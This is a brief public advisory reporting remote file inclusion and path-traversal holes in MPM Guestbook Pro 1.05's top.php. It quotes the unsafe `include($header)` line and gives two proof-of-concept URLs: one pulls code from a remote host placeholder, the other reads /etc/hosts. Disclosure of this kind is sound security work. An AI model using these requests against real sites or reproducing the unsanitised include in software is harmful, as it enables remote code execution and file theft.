__  ___/____  __________  /____________ _____  ___/______________  _____________ 
_____ \__  / / /_  ___/  __/  _ \_  __ `__ \____ \_  _ \  ___/  / / /_  ___/  _ \
____/ /_  /_/ /_(__  )/ /_ /  __/  / / / / /___/ //  __/ /__ / /_/ /_  /   /  __/
/____/ _\__, / /____/ \__/ \___//_/ /_/ /_//____/ \___/\___/ \__,_/ /_/    \___/ 
       /____/                                                                    
                         
   ____________________ _
   _  __ \_  ___/_  __ `/
___/ /_/ /  /   _  /_/ / 
_(_)____//_/    _\__, /  
                /____/   


Ref: SS#11012005
SYSTEMSECURE.ORG - Advisory/Exploit

* PUBLIC ADVISORY *

Software:
MPM Guestbook Pro 1.05    (maybe all versions)

Link:
http://mpm.pahviloota.net/

Attacks:
Remote File Include and File Disclusore

Discovered by:
SmOk3 [smok3f00@gmail.com]

Vendor:
Warned about this vulnerability


-- ! Description !--

MPM Guestbook Pro is a famous php Guestbook system. This script allows malicious users to include
arbitrary script code from remote. This may expose sensitive information and compromise the entire
system. The problem is in the file "top.php", in the first lines:

<?php include($header); ?>

PoC: /gbpro/top.php?header=http://[CMD]


Also, you can view any file in the system, due to file disclure on the same variable.

PoC: /gbpro/top.php?header=../../../../../../../etc/hosts



-- ! Solution !--

No patch available yet.




<base64>Rm9y52EgUG9ydHVnYWw=</base64>

-EOF-